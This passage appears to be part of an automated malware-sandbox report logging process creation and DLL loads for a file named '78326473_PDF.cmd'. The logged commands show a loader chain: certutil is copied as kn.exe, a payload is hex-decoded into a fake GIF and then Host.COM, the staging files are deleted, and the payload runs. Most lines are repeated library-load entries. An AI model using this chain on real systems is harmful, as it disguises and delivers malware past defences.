    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\Host.COM C:\Users\Public\Libraries\Host.COMJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S Jump to behavior
    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\78326473_PDF.cmd" "C:\\Users\\Public\\Host.GIF" 3 Jump to behavior
    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10 Jump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: version.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: url.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: ieframe.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: userenv.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: netutils.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: wldp.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: propsys.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
